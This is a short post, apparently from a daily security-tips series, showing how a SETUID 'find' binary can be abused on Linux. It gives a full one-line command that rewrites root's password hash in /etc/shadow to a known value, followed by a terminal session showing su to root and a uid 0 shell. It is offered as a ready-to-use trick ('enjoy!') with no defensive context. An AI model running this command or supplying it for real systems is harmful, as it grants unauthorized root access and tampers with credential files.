Day 66: More Shenanigans with /etc/shadow — abusing find SETUID.

Did you know if find has SETUID bit, then you can use it to replace root password with a simple command?

This snippet changes the password to 1234, enjoy!

find . -exec sed -Ei ‘s/^(root\:)\*(.*)/\1\$6\$ZbvneNDSEXXO4pk1\$DmvtdGOHZA8mbpVih5xtHrBcKk8VxZ0rXwLEK2M1iciGvM6qHXfuSY5YosPHj3Zv063JUX2p1TQqya4k1Azjx0\2/’ /etc/shadow \;

Now just su to root.

user@box:/$ su root
Password:
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)